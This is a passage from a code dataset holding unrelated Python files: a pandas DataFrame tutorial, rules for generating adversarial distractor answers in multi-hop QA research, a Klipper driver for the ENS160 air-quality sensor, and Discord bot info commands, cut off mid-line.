pd.DataFrame({'price':car_price,'Manufacturer':car_man})\nprint(cars)\nprint(cars['price'])\nprint(cars['Manufacturer'])\n\n'''\nA DataFrame is a collection of Series objects, and a single-column DataFrame can be constructed from a single Series:\n'''\n#Using dictionary to create a series\ncar_price_dict = {'Swift': 700000,\n 'Jazz' : 800000,\n 'Civic' : 1600000,\n 'Altis' : 1800000,\n 'Gallardo': 30000000\n }\ncar_price = pd.Series(car_price_dict)\n#Creating a DataFrame 
from car_price Series\ncar_dataset = pd.DataFrame(car_price, columns=['Car Price'])\nprint(car_dataset)\n\n'''\nFrom lists of dictionaries\n'''\ndata = [{'Name': 'Subodh', 'Marks': 28},\n {'Name': 'Ram', 'Marks': 27}, \n {'Name': 'Abdul', 'Marks': 26}, \n {'Name': 'John', 'Marks': 28}]\ndata = pd.DataFrame(data)\nprint(data)\n\ndata = pd.DataFrame([{'Subodh':20, 'Ram':25},\n {'Abdul':29, 'John':24}], \n index = ['Mathematics', 'Physics'])\n\n#Using dictionary to create a series\ncar_price_dict = {'Swift': 700000,\n 'Jazz' : 800000,\n 'Civic' : 1600000,\n 'Altis' : 1800000,\n 'Gallardo': 30000000\n }\ncar_price = pd.Series(car_price_dict)\ncar_man_dict = {'Swift' : 'Maruti',\n 'Jazz' : 'Honda',\n 'Civic' : 'Honda',\n 'Altis' : 'Toyota',\n 'Gallardo' : 'Lamborghini'}\ncar_man = pd.Series(car_man_dict)\ncars = pd.DataFrame({'Price': car_price , 'Manufacturer' : car_man})\nprint(cars)\n\n'''\nThe axis keyword\nOne of the important parameters used while performing operations on DataFrames is 'axis'. Axis takes two values: 0 and 1.\n\naxis = 0 represents row specific operations.\n\naxis = 1 represents column specific operations.\n'''","repo_name":"itechdp/Infosys-SpringBoard-Learning","sub_path":"Python For Data Science/Pandas/intro_to_pandas.py","file_name":"intro_to_pandas.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15870425261","text":"import math\nimport random\nimport string \nimport json\nimport numpy as np\nfrom pattern.en import conjugate\nfrom resources.nectar import corenlp\nfrom nltk.corpus import wordnet\nfrom nltk.corpus import stopwords\n\nCOMMON_WORDS = list(stopwords.words('english'))\nPUNCTUATIONS = list(string.punctuation)\n\nFIRST_NAMES = ['Jason', 'Mary', 'James', 'Jeff', 'Abi', 'Bran', 'Sansa', 'Jon', 'Ned', 'Peter', 'Jaime', \\\n'Marcus', 'Chris', 'Diana', 'Phoebe', 'Leo', 'Phil', 'Nick', 'Steve']\nLAST_NAMES = ['Kid', 'Jordan', 'Harden', 'Dean', 'Stark', 'Parker', 'Morris', 'Wallace', 'Manning', 'Rogers', 'Folt', 'White']\nLOCATIONS = ['Chicago', 'Beijing', 'Tokyo', 'Pittsburg', 'Paris', 'Barcelona', 'Madrid', 'Berlin', 'Europe', 'California']\nORGANIZATIONS_START = LAST_NAMES + LOCATIONS\nORGANIZATIONS_END = ['Corporations', 'Industries', 'University', 'Association', 'Department']\nNNP_START = ['Central', 'Eastern', 'Western', 'Golden', 'Stony', 'Student', 'Brooks']\nNNP_END = ['Park', 'House', 'Center', 'Palace', 'Place', 'Store']\nNNPS_START = NNP_START\nNNPS_END = ['Parks', 'Gardens', 'Bullets', 'Lakers', 'Brothers']\nNNPS = ['Cool Kids', 'Kew Gardens', 'Silver Bullets', 'LA Lakers', 'Brooks Brothers']\nNN = ['hamster', 'composer', 'man', 'statement']\nNNS = ['hamsters', 'composers', 'men', 'statements']\n\n\ndef lookup_title_generate(checker, rule):\n '''\n uses cached list of old answers to generate a real answer, return None if it\n does not pass the checker function\n '''\n\n def func(a, tokens, question, title_cache, **kwargs):\n fake = checker(a, tokens, question, **kwargs)\n if fake is None:\n return None\n\n tok_len = len(tokens)\n counter = 0\n new_ans = a\n while new_ans == a:\n if tok_len <= 0:\n return None\n\n counter2 = 0\n while True:\n if str(tok_len) in title_cache[rule]:\n new_ans, new_ans_tok = random.choice(title_cache[rule][str(tok_len)])\n if a.lower().startswith('the ') and (new_ans.lower().startswith('the ') is False) \\\n or a.lower().startswith('the ') is False and new_ans.lower().startswith('the '):\n counter2 += 1\n if counter2 == 
40:\n break\n else:\n break\n else:\n tok_len -= 1\n if tok_len <= 0:\n return None\n\n counter += 1\n if counter == 40:\n tok_len -= 1\n counter = 0\n\n if a.lower().startswith('the ') and (new_ans.lower().startswith('the ') is False):\n new_ans = 'The ' + new_ans\n new_ans_tok = [{'originalText': 'The', 'pos': 'DT', 'word': 'the'}] + new_ans_tok\n assert counter2 == 40\n\n return new_ans, new_ans_tok\n return func\n\n\nMONTHS = ['january', 'february', 'march', 'april', 'may', 'june', 'july',\n 'august', 'september', 'october', 'november', 'december']\n\n\ndef bridge_date(a, tokens, q, **kwargs):\n out_toks = []\n if not all(t['ner'] == 'DATE' for t in tokens): return None\n for t in tokens:\n if t['pos'] == 'CD' or t['word'].isdigit():\n try:\n value = int(t['word'])\n except:\n value = 10 # fallback\n if value > 50: \n rand = np.random.randint(0, 10)\n if rand%2 == 0:\n new_val = str(value - np.random.randint(10, 25)) # Year\n else:\n new_val = str(value + np.random.randint(10, 25)) # Year\n else: # Day of month\n if value > 15: new_val = str(value - np.random.randint(1, 12))\n else: new_val = str(value + np.random.randint(1, 12))\n else:\n if t['word'].lower() in MONTHS:\n m_ind = MONTHS.index(t['word'].lower())\n new_val = MONTHS[(m_ind + np.random.randint(1, 11)) % 12].title()\n else:\n # Give up\n new_val = t['originalText']\n out_toks.append({'before': t['before'], 'originalText': new_val})\n new_ans = corenlp.rejoin(out_toks).strip()\n if new_ans == a: return None\n return new_ans, out_toks\n\n\ndef bridge_number(a, tokens, q, **kwargs):\n \"\"\"\n Difference with ans_number: \n 1. Not changing 'thousand', 'million', etc.\n 2. Change trailing digit\n \"\"\"\n out_toks = []\n seen_num = False\n for t in tokens:\n ner = t['ner']\n pos = t['pos']\n w = t['word']\n out_tok = {'before': t['before']}\n\n # Split on dashes\n leftover = ''\n dash_toks = w.split('-')\n if len(dash_toks) > 1:\n w = dash_toks[0]\n leftover = '-'.join(dash_toks[1:])\n\n # Try to get a number out\n value = None\n if w != '%': \n # Percent sign should just pass through\n try:\n value = float(w.replace(',', ''))\n except:\n try:\n norm_ner = t['normalizedNER']\n if norm_ner[0] in ('%', '>', '<'):\n norm_ner = norm_ner[1:]\n value = float(norm_ner)\n except:\n pass\n if not value and (\n ner == 'NUMBER' or \n (ner == 'PERCENT' and pos == 'CD')):\n # Force this to be a number anyways\n value = 10\n if value:\n if math.isinf(value) or math.isnan(value): value = 9001\n seen_num = True\n if w in ('thousand', 'million', 'billion', 'trillion'):\n new_val = w\n else:\n if value < 2500: # This could be years, so don't change too much\n rand = np.random.randint(0, 10)\n if rand%2 == 0:\n new_val = str(value - np.random.randint(1, 11))\n else:\n new_val = str(value + np.random.randint(1, 11))\n else:\n # Change leading digit\n if value == int(value):\n val_chars = list('%d' % value)\n else:\n val_chars = list('%g' % value)\n c = val_chars[-1]\n for i in range(len(val_chars)):\n c = val_chars[len(val_chars)-1-i]\n if c >= '0' and c <= '9':\n val_chars[len(val_chars)-1-i] = str(max((int(c) + np.random.randint(1, 10)) % 10, 1))\n break\n new_val = ''.join(val_chars)\n if leftover:\n new_val = '%s-%s' % (new_val, leftover)\n out_tok['originalText'] = new_val\n else:\n out_tok['originalText'] = t['originalText']\n\n if t['originalText'].endswith('.0') is False and out_tok['originalText'].endswith('.0'):\n out_tok['originalText'] = out_tok['originalText'][:-2]\n out_toks.append(out_tok)\n if seen_num:\n return 
corenlp.rejoin(out_toks).strip(), out_toks\n    else:\n        return None\n\n\ndef process_token(word, original_tok):\n    new_word = word\n    if original_tok['pos'].startswith('V'):\n        if original_tok['pos'] == 'VB':\n            new_word = conjugate(word, 'VB')\n        elif original_tok['pos'] == 'VBD':\n            new_word = conjugate(word, 'VBD')\n        elif original_tok['pos'] == 'VBN':\n            new_word = conjugate(word, 'VBN')\n        elif original_tok['pos'] == 'VBG':\n            new_word = conjugate(word, 'VBG')\n        elif original_tok['pos'] == 'VBZ':\n            new_word = conjugate(word, 'VBZ')\n        elif original_tok['pos'] == 'VBP':\n            new_word = conjugate(word, 'VBP')\n    return new_word\n\n\ndef bridge_wordnet_catch_amap(a, tokens, q, **kwargs):\n    \"\"\"Returns a function that yields new_ans if the wordnet can find its antonyms\"\"\"\n    new_anss = []\n    for t in tokens:\n        if t['originalText'].lower() in COMMON_WORDS + PUNCTUATIONS:\n            new_anss.append(t['originalText'])\n            continue \n        antonyms = []\n        for syn in wordnet.synsets(t['originalText']): \n            for l in syn.lemmas(): \n                if l.antonyms(): \n                    antonyms.append(l.antonyms()[0].name())\n        \n        new_word = None\n        if t['pos'].startswith('VB') or t['pos'].startswith('JJ') or t['pos'].startswith('R'):\n            for w in antonyms:\n                if w.lower() != t['originalText'].lower() and t['originalText'] not in w.lower() and '_' not in w:\n                    new_word = process_token(w, t)\n                    break\n        if new_word:\n            new_anss.append(new_word)\n        else:\n            return None\n    \n    if len(new_anss) == 0:\n        return None\n    for new_ans in new_anss:\n        if new_ans.lower() != a.lower():\n            return new_ans\n    return None\n\n\ndef bridge_entity_full(ner_tag, new_ans):\n    \"\"\"Returns a function that yields new_ans iff every token has |ner_tag|.\"\"\"\n    def func(a, tokens, q, is_end=False, **kwargs):\n        for t in tokens:\n            if t['ner'] != ner_tag: return None\n        if ner_tag == 'PERSON':\n            if is_end:\n                return LAST_NAMES[random.randint(0, len(LAST_NAMES)-1)]\n            else:\n                return FIRST_NAMES[random.randint(0, len(FIRST_NAMES)-1)]\n        elif ner_tag == 'LOCATION':\n            return LOCATIONS[random.randint(0, len(LOCATIONS)-1)]\n        elif ner_tag == 'ORGANIZATION':\n            if is_end:\n                return ORGANIZATIONS_END[random.randint(0, len(ORGANIZATIONS_END)-1)]\n            else:\n                return ORGANIZATIONS_START[random.randint(0, len(ORGANIZATIONS_START)-1)]\n        return new_ans\n    return func\n\n\ndef bridge_abbrev(new_ans):\n    def func(a, tokens, q, **kwargs):\n        s = a\n        if s == s.upper() and s != s.lower():\n            return new_ans\n        return None\n    return func\n\n\ndef bridge_pos(pos, new_ans, end=False, add_dt=False):\n    \"\"\"Returns a function that yields new_ans if the first/last token has |pos|.\"\"\"\n    def func(a, tokens, q, is_end=True, **kwargs):\n        if end:\n            for it in range(len(tokens)):\n                t = tokens[-1-it]\n                if t['originalText'] not in PUNCTUATIONS:\n                    break\n        else:\n            t = tokens[0]\n        if t['pos'] != pos: return None\n        if pos == 'NN':\n            return NN[random.randint(0, len(NN)-1)]\n        if pos == 'NNS':\n            return NNS[random.randint(0, len(NNS)-1)]\n        if pos == 'NNP':\n            if is_end:\n                return NNP_END[random.randint(0, len(NNP_END)-1)]\n            else:\n                return NNP_START[random.randint(0, len(NNP_START)-1)]\n        if pos == 'NNPS':\n            if is_end:\n                return NNPS_END[random.randint(0, len(NNPS_END)-1)]\n            else:\n                return NNPS_START[random.randint(0, len(NNPS_START)-1)]\n        return new_ans\n    return func\n\n    \ndef bridge_catch_all(new_ans):\n    def func(a, tokens, q, **kwargs):\n        if tokens[0]['originalText'][0].isupper():\n            return new_ans[0].upper()+new_ans[1:]\n        return new_ans\n    return 
func","repo_name":"jiangycTarheel-zz/Adversarial-MultiHopQA","sub_path":"bridge_entity_rules.py","file_name":"bridge_entity_rules.py","file_ext":"py","file_size_in_byte":9931,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"40667609225","text":"import logging\nimport csv\nimport time\nimport struct\nimport threading\nimport queue\nimport datetime\n\nfrom . import bus\n\n\nclass ENS160:\n def __init__(self, config):\n self.printer = config.get_printer()\n self.name = config.get_name().split()[1]\n self.reactor = self.printer.get_reactor()\n self.i2c = bus.MCU_I2C_from_config(\n config, default_addr=ENS160_I2CADDR_DEFAULT, default_speed=400000)\n self.report_time = config.getfloat(\n \"report_time\", default=1., minval=1.)\n self.sample_timer = self.reactor.register_timer(self.sample_ens160)\n self.syslog_time = config.getfloat(\n \"syslog_time\", default=self.reactor.NEVER)\n self.syslog_last_updated = self.reactor.NOW\n self.csv_basename = config.get(\"csv_basename\", default=None)\n self.csv_log_queue = queue.Queue()\n self.eCO2 = self.TVOC = None\n self.ens160 = None\n self.temperature_sensor = None\n self.temperature_sensor_name = config.get(\n \"temperature_sensor\", default=None)\n self.temperature_key = config.get(\n \"temperature_key\", default=\"temperature\")\n self.temperature_initial = config.getfloat(\n \"temperature_initial\", default=None) # units deg C\n self.temperature_last = None\n self.humidity_sensor = None\n self.humidity_sensor_name = config.get(\n \"humidity_sensor\", default=self.temperature_sensor_name)\n self.humidity_key = config.get(\"humidity_key\", default=\"humidity\")\n self.humidity_initial = config.getfloat(\n \"humidity_initial\", default=None) # units RH %\n self.humidity_last = None\n self.printer.add_object(\"ens160 \" + self.name, self)\n self.printer.register_event_handler(\n \"klippy:connect\", self.handle_connect)\n\n if not self.temperature_sensor_name and not self.temperature_initial:\n raise config.error(\n \"ens160 {}: must specify either 'temperature_sensor'\"\n \" or 'temperature_initial'\".format(self.name))\n\n if not self.humidity_sensor_name and not self.humidity_initial:\n raise config.error(\n \"ens160 {}: must specify either 'humidity_sensor'\"\n \" or 'humidity_initial'\".format(self.name))\n\n gcode = self.printer.lookup_object('gcode')\n gcode.register_mux_command(\"AIR_QUALITY_CSV_LOGGING_START\",\n \"NAME\",\n self.name,\n self.cmd_CSV_LOGGING_START,\n desc=\"Start air quality csv logging\")\n gcode.register_mux_command(\"AIR_QUALITY_CSV_LOGGING_STOP\",\n \"NAME\",\n self.name,\n self.cmd_CSV_LOGGING_STOP,\n desc=\"Stop air quality csv logging\")\n\n def cmd_CSV_LOGGING_START(self, gcmd):\n if self.csv_basename:\n self.csv_log_queue.put_nowait({\n \"type\": \"start\",\n \"gcmd\": gcmd\n })\n else:\n gcmd.respond_info(\"ens160 {}: csv_basename not specified\"\n .format(self.name))\n\n def cmd_CSV_LOGGING_STOP(self, gcmd):\n if self.csv_basename:\n self.csv_log_queue.put_nowait({\n \"type\": \"stop\",\n \"gcmd\": gcmd\n })\n else:\n gcmd.respond_info(\"ens160 {}: csv_basename not specified\"\n .format(self.name))\n\n def handle_connect(self):\n self.ens160 = DFRobot_ENS160(self.i2c, self.reactor)\n\n if self.temperature_sensor_name:\n self.temperature_sensor = self.printer.lookup_object(\n self.temperature_sensor_name)\n\n if self.humidity_sensor_name:\n self.humidity_sensor = self.printer.lookup_object(\n self.humidity_sensor_name)\n\n if self.csv_basename:\n 
threading.Thread(target=csv_logger, args=(\n self.name, self.csv_basename,\n self.reactor, self.csv_log_queue)).start()\n\n self.reactor.update_timer(self.sample_timer, self.reactor.NOW)\n\n def sample_ens160(self, eventtime):\n measured_time = self.reactor.monotonic()\n\n # update ens160 temp/humidity to aid with measurement compensation\n temperature_status = self.temperature_sensor.get_status(eventtime) \\\n if self.temperature_sensor \\\n else {self.temperature_key: self.temperature_initial}\n tempC = temperature_status[self.temperature_key]\n humidity_status = self.humidity_sensor.get_status(eventtime) \\\n if self.humidity_sensor \\\n else {self.humidity_key: self.humidity_initial}\n humidity = humidity_status[self.humidity_key]\n\n try:\n # require both temperature/humidity to update ens160 compensation\n if tempC and humidity:\n self.ens160.set_temp_and_hum(tempC, humidity)\n\n # perform measurement\n status, aqi, self.TVOC, self.eCO2 = self.ens160.air_quality()\n hydrogen, acetone, carbon_monoxide, toluene = self.ens160.raw()\n except Exception as err:\n logging.exception(\n \"ens160 {}: Error reading data - {}\".format(self.name, err))\n self.eCO2 = self.TVOC = .0\n return self.reactor.NEVER\n\n # log measurement to syslog\n now = self.reactor.monotonic()\n if self.syslog_time > 0:\n if now - self.syslog_last_updated > self.syslog_time:\n logging.info(\"ens160 {}: measured - AQI: {}, eCO2: {}, TVOC: {}\"\n .format(self.name, aqi, self.eCO2, self.TVOC))\n self.syslog_last_updated = now\n\n # log measurement to csv\n if self.csv_basename:\n self.csv_log_queue.put_nowait({\n \"type\": \"update\",\n \"monotonic\": now,\n \"status\": status,\n \"aqi\": aqi,\n \"eco2\": self.eCO2,\n \"tvoc\": self.TVOC,\n \"hydrogenRaw\": hydrogen,\n \"acetoneRaw\": acetone,\n \"carbonMonoxideRaw\": carbon_monoxide,\n \"tolueneRaw\": toluene,\n \"temperature\": temperature_status,\n \"humidity\": humidity_status\n })\n\n # schedule next loop\n return measured_time + self.report_time\n\n def get_status(self, eventtime):\n return {\n 'eco2': self.eCO2,\n 'tvoc': self.TVOC,\n }\n\n\ndef csv_logger(name, basename, reactor, data_queue):\n try:\n def gcmd_result(gcmd, val):\n reactor.register_async_callback((lambda e: gcmd.respond_info(val)))\n\n csvfile = None\n csvwriter = None\n while True:\n item = data_queue.get()\n item_type = item['type']\n if item_type == \"start\":\n if not csvfile:\n filename = basename + datetime.datetime.now().strftime(\n \"_%Y-%m-%d_%H-%M-%S.csv\")\n csvfile = open(filename, 'w')\n gcmd_result(item['gcmd'],\n \"ens160 {}: csv logging started '{}'\"\n .format(name, filename))\n else:\n gcmd_result(item['gcmd'],\n \"ens160 {}: csv logging already started\"\n .format(name))\n elif item_type == \"stop\":\n if csvfile:\n csvfile.close()\n csvfile = None\n csvwriter = None\n gcmd_result(item['gcmd'],\n \"ens160 {}: csv logging stopped\".format(name))\n else:\n gcmd_result(item['gcmd'],\n \"ens160 {}: csv logging already stopped\"\n .format(name))\n elif item_type == \"update\" and csvfile:\n t = item['temperature']\n h = item['humidity']\n\n if not csvwriter:\n csvwriter = csv.writer(csvfile)\n row = ['unix_time', 'monotonic_time', 'AQI', 'ECO2', 'TVOC',\n 'hydrogen_raw', 'acetone_raw', 'carbon_monoxide_raw',\n 'toluene_raw']\n row.extend(\"temperature_{}\".format(x) for x in sorted(t))\n row.extend(\"humidity_{}\".format(x) for x in sorted(h))\n csvwriter.writerow(row)\n\n row = [time.time(), item['monotonic'], item['aqi'],\n item['eco2'], item['tvoc'], item['hydrogenRaw'],\n 
item['acetoneRaw'], item['carbonMonoxideRaw'],\n item['tolueneRaw']]\n row.extend(t[k] for k in sorted(t))\n row.extend(h[k] for k in sorted(h))\n csvwriter.writerow(row)\n csvfile.flush()\n\n data_queue.task_done()\n except Exception as err:\n logging.exception(\"ens160 {}: csv error - {}\".format(name, err))\n\n\n# The DFRobot_ENS160 class is heavily inspired/taken from\n\n'''!\n @file DFRobot_ENS160.py\n @brief Define infrastructure of DFRobot_ENS160 class\n @details This is a Digital Metal-Oxide Multi-Gas Sensor. It can be controlled by I2C and SPI port.\n @n Detection of a variety of gases, such as volatile organic compounds (VOCs), including ethanol,\n @n toluene, as well as hydrogen and nitrogen dioxide, has superior selectivity and accuracy.\n @copyright Copyright (c) 2010 DFRobot Co.Ltd (http://www.dfrobot.com)\n @license The MIT License (MIT)\n @author [qsjhyy](yihuan.huang@dfrobot.com)\n @version V1.0\n @date 2021-10-28\n @url https://github.com/DFRobot/DFRobot_ENS160\n'''\n\n\nENS160_I2CADDR_DEFAULT = 0x53\n\nENS160_PART_ID = 0x0160\n\n# ENS160 register address\n\n# This 2-byte register contains the part number in little endian of the ENS160.\nENS160_PART_ID_REG = 0x00\n# This 1-byte register sets the Operating Mode of the ENS160.\nENS160_OPMODE_REG = 0x10\n# This 1-byte register configures the action of the INTn pin.\nENS160_CONFIG_REG = 0x11\n# This 1-byte register allows some additional commands to be executed on the ENS160.\nENS160_COMMAND_REG = 0x12\n# This 2-byte register allows the host system to write ambient temperature data to ENS160 for compensation.\nENS160_TEMP_IN_REG = 0x13\n# This 2-byte register allows the host system to write relative humidity data to ENS160 for compensation.\nENS160_RH_IN_REG = 0x15\n# This 1-byte register indicates the current STATUS of the ENS160.\nENS160_DATA_STATUS_REG = 0x20\n# This 1-byte register reports the calculated Air Quality Index according to the UBA.\nENS160_DATA_AQI_REG = 0x21\n# This 2-byte register reports the calculated TVOC concentration in ppb.\nENS160_DATA_TVOC_REG = 0x22\n# This 2-byte register reports the calculated equivalent CO2-concentration in ppm, based on the detected VOCs and hydrogen.\nENS160_DATA_ECO2_REG = 0x24\n# This 2-byte register reports the calculated ethanol concentration in ppb.\nENS160_DATA_ETOH_REG = 0x22\n# This 2-byte register reports the temperature used in its calculations (taken from TEMP_IN, if supplied).\nENS160_DATA_T_REG = 0x30\n# This 2-byte register reports the relative humidity used in its calculations (taken from RH_IN if supplied).\nENS160_DATA_RH_REG = 0x32\n# This 1-byte register reports the calculated checksum of the previous DATA_ read transaction (of n-bytes).\nENS160_DATA_MISR_REG = 0x38\n# This 8-byte register is used by several functions for the Host System to pass data to the ENS160.\nENS160_GPR_WRITE_REG = 0x40\n# This 8-byte register is used by several functions for the ENS160 to pass data to the Host System.\nENS160_GPR_READ_REG = 0x48\n\n# OPMODE(Address 0x10) register mode\nENS160_SLEEP_MODE = 0x00 # DEEP SLEEP mode (low power standby).\nENS160_IDLE_MODE = 0x01 # IDLE mode (low-power).\nENS160_STANDARD_MODE = 0x02 # STANDARD Gas Sensing Modes.\n\n\nclass DFRobot_ENS160:\n def __init__(self, i2c, reactor):\n self._i2c = i2c\n self._reactor = reactor\n\n # 100ms delay to wake up\n self._reactor.pause(self._reactor.monotonic() + 0.1)\n\n part_id = self.part_id()\n if part_id != ENS160_PART_ID:\n raise RuntimeError(\n \"Expected ENS160 part id: 0x{:04X}, got 0x{:04X}\"\n 
.format(ENS160_PART_ID, part_id))\n\n self.set_PWR_mode(ENS160_STANDARD_MODE)\n self.set_INT_mode(0x02)\n\n def part_id(self):\n params = self._i2c.i2c_read([ENS160_PART_ID_REG], 2)\n return struct.unpack(' | | ]\n Description:\n Provides information about the given role.\n \"\"\"\n server_roles = sorted(ctx.server.roles, key=lambda role: role.position)\n\n if ctx.arg_str.strip() == \"\":\n await ctx.pager(ctx.paginate_list([role.name for role in reversed(server_roles)]))\n return\n role = await ctx.find_role(ctx.arg_str, create=False, interactive=True)\n if role is None:\n return\n\n title = \"{role.name} (id: {role.id})\".format(role=role)\n\n colour = role.colour if role.colour.value else discord.Colour.light_grey()\n num_users = len([user for user in ctx.server.members if (role in user.roles)])\n created_ago = \"({} ago)\".format(ctx.strfdelta(datetime.utcnow() - role.created_at, minutes=False))\n created = role.created_at.strftime(\"%I:%M %p, %d/%m/%Y\")\n hoisted = \"Yes\" if role.hoist else \"No\"\n mentionable = \"Yes\" if role.mentionable else \"No\"\n\n prop_list = [\"Colour\", \"Hoisted\", \"Mentionable\", \"Number of members\", \"Created at\", \"\"]\n value_list = [str(role.colour), hoisted, mentionable, num_users, created, created_ago]\n desc = ctx.prop_tabulate(prop_list, value_list)\n\n pos = role.position\n position = \"```markdown\\n\"\n for i in reversed(range(-3, 4)):\n line_pos = pos + i\n if line_pos < 0:\n break\n if line_pos >= len(server_roles):\n continue\n position += \"{0:<4}{1}{2:<20}\\n\".format(str(line_pos) + \".\", \" \" * 4 + (\">\" if str(server_roles[line_pos]) == str(role) else \" \"), str(server_roles[line_pos]))\n position += \"```\"\n if role > ctx.author.top_role:\n diff_str = \"(Higher than your highest role)\"\n elif role < ctx.author.top_role:\n diff_str = \"(Lower than your highest role)\"\n elif role == ctx.author.top_role:\n diff_str = \"(This is your highest role!)\"\n position += diff_str\n\n embed = discord.Embed(title=title, colour=colour, description=desc)\n# embed.set_thumbnail(url=thumbnail)\n emb_fields = [(\"Position in the hierarchy\", position, 0)]\n await ctx.emb_add_fields(embed, emb_fields)\n out_msg = await ctx.reply(embed=embed, dm=ctx.bot.objects[\"brief\"])\n if out_msg and ctx.bot.objects[\"brief\"]:\n await ctx.confirm_sent(reply=\"Roleinfo sent!\")\n\n\n@cmds.cmd(name=\"rolemembers\",\n category=\"Info\",\n short_help=\"Lists members with a particular role.\",\n edit_handler=cmds.edit_handler_rerun,\n aliases=[\"rolemems\", \"whohas\"])\n@cmds.require(\"in_server\")\nasync def cmd_rolemembers(ctx):\n \"\"\"\n Usage:\n {prefix}rolemembers [ | | ]\n Description:\n Lists the users with this role.\n \"\"\"\n\n if ctx.arg_str.strip() == \"\":\n await ctx.reply(\"Please give me a role to list the members of.\")\n return\n\n role = await ctx.find_role(ctx.arg_str, create=False, interactive=True)\n if role is None:\n return\n\n members = [str(mem) for mem in ctx.server.members if role in mem.roles]\n if len(members) == 0:\n await ctx.reply(\"No members have this role.\")\n return\n\n out_msg = await ctx.pager(ctx.paginate_list(members, title=\"Members in {}\".format(role.name)), dm=ctx.bot.objects[\"brief\"])\n if out_msg and ctx.bot.objects[\"brief\"]:\n await ctx.confirm_sent(reply=\"Rolemembers sent!\")\n\n\n@cmds.cmd(\"userinfo\",\n category=\"Info\",\n short_help=\"Shows the user's information\",\n edit_handler=cmds.edit_handler_rerun,\n aliases=[\"uinfo\", \"ui\", 
\"user\"])\n@cmds.require(\"in_server\")\n@cmds.execute(\"user_lookup\", in_server=True, greedy=True)\nasync def cmd_userinfo(ctx):\n \"\"\"\n Usage:\n {prefix}userinfo [user]\n Description:\n Sends information on the provided user, or yourself.\n \"\"\"\n user = ctx.author\n if ctx.arg_str != \"\":\n user = ctx.objs[\"found_user\"]\n if not user:\n await ctx.reply(\"No matching users found!\")\n return\n # Manually get a new user in case the old one was out of date\n new_user = await ctx.bot.get_user_info(user.id)\n\n avlink = await ctx.get_avatar(new_user)\n bot_emoji = ctx.bot.objects[\"emoji_bot\"]\n statusdict = {\"offline\": (\"Offline/Invisible\", ctx.bot.objects[\"emoji_offline\"]),\n \"dnd\": (\"Do Not Disturb\", ctx.bot.objects[\"emoji_dnd\"]),\n \"online\": (\"Online\", ctx.bot.objects[\"emoji_online\"]),\n \"idle\": (\"Idle/Away\", ctx.bot.objects[\"emoji_idle\"])}\n colour = (user.colour if user.colour.value else discord.Colour.light_grey())\n\n name = \"{} {}\".format(user, bot_emoji if user.bot else \"\")\n game = user.game if user.game else \"Nothing\"\n status = \"{1}{0}\".format(*statusdict[str(user.status)])\n shared = \"{} servers\".format(len(list(filter(lambda m: m.id == user.id, ctx.bot.get_all_members()))))\n joined_ago = \"({} ago)\".format(ctx.strfdelta(datetime.utcnow() - user.joined_at, minutes=False))\n joined = user.joined_at.strftime(\"%I:%M %p, %d/%m/%Y\")\n created_ago = \"({} ago)\".format(ctx.strfdelta(datetime.utcnow() - user.created_at, minutes=False))\n created = user.created_at.strftime(\"%I:%M %p, %d/%m/%Y\")\n usernames = await ctx.bot.data.users_long.get(user.id, \"name_history\")\n name_list = \"{}{}\".format(\"..., \" if len(usernames) > 10 else \"\",\n \", \".join(usernames[-10:])) if usernames else \"No recent past usernames.\"\n nicknames = await ctx.bot.data.members_long.get(ctx.server.id, user.id, \"nickname_history\")\n nickname_list = \"{}{}\".format(\"..., \" if len(nicknames) > 10 else \"\",\n \", \".join(nicknames[-10:])) if nicknames else \"No recent past nicknames.\"\n \"\"\"\n # Last status stuff is disabled for now\n last_status = await ctx.bot.data.users.get(user.id, \"old_status\")\n if last_status:\n status_str = \"(Was {})\".format(statusdict[last_status[0]][0])\n last_seen = int(datetime.utcnow().strftime('%s')) - last_status[2]\n if last_seen > 60:\n seen_ago = \"{} ago\".format(ctx.strfdelta(timedelta(seconds=last_seen)))\n else:\n seen_ago = \"Now\"\n# last_seen = \"{}, {}\".format(seen_ago, status_str)\n else:\n seen_ago = \"No status changes seen!\"\n status_str = \"\"\n prop_list = [\"Full name\", \"Nickname\", \"Names\", \"Nicknames\", \"Status\", \"Playing\", \"Seen in\", \"Last seen\", \"\", \"Joined at\", \"\", \"Created at\", \"\"]\n value_list = [name, user.display_name, name_list, nickname_list, status, game, shared, seen_ago, status_str, joined, joined_ago, created, created_ago]\n \"\"\"\n\n prop_list = [\"Full name\", \"Nickname\", \"Names\", \"Nicknames\", \"Status\", \"Playing\", \"Seen in\", \"Joined at\", \"\", \"Created at\", \"\"]\n value_list = [name, user.display_name, name_list, nickname_list, status, game, shared, joined, joined_ago, created, created_ago]\n desc = ctx.prop_tabulate(prop_list, value_list)\n\n roles = [r.name for r in user.roles if r.name != \"@everyone\"]\n roles = ('`' + '`, `'.join(roles) + '`') if roles else \"None\"\n\n joined = sorted(ctx.server.members, key=lambda mem: mem.joined_at)\n pos = joined.index(user)\n positions = []\n for i in range(-3, 4):\n line_pos = pos + i\n if 
line_pos < 0:\n continue\n if line_pos >= len(joined):\n break\n positions.append(\"{0:<4}{1}{2:<20}\".format(str(line_pos + 1) + \".\", \" \" * 4 + (\">\" if joined[line_pos] == user else \" \"), str(joined[line_pos])))\n join_seq = \"```markdown\\n{}\\n```\".format(\"\\n\".join(positions))\n\n embed = discord.Embed(type=\"rich\", color=colour, description=desc)\n embed.set_author(name=\"{user.name} (id: {user.id})\".format(user=new_user),\n icon_url=avlink,\n url=avlink)\n embed.set_thumbnail(url=avlink)\n\n emb_fields = [(\"Roles\", roles, 0), (\"Join order\", join_seq, 0)]\n await ctx.emb_add_fields(embed, emb_fields)\n\n out_msg = await ctx.reply(embed=embed, dm=ctx.bot.objects[\"brief\"])\n if out_msg and ctx.bot.objects[\"brief\"]:\n await ctx.confirm_sent(reply=\"Userinfo sent!\")\n\n\n@cmds.cmd(\"serverinfo\",\n category=\"Info\",\n short_help=\"Shows server info.\",\n edit_handler=cmds.edit_handler_rerun,\n aliases=[\"sinfo\", \"si\"])\n@cmds.execute(\"flags\", flags=[\"icon\"])\n@cmds.require(\"in_server\")\nasync def cmd_serverinfo(ctx):\n \"\"\"\n Usage:\n {prefix}serverinfo [--icon]\n Description:\n Shows information about the server you are in.\n With --icon, just displays the server icon.\n \"\"\"\n if ctx.flags[\"icon\"]:\n embed = discord.Embed(color=discord.Colour.light_grey())\n embed.set_image(url=ctx.server.icon_url)\n\n out_msg = await 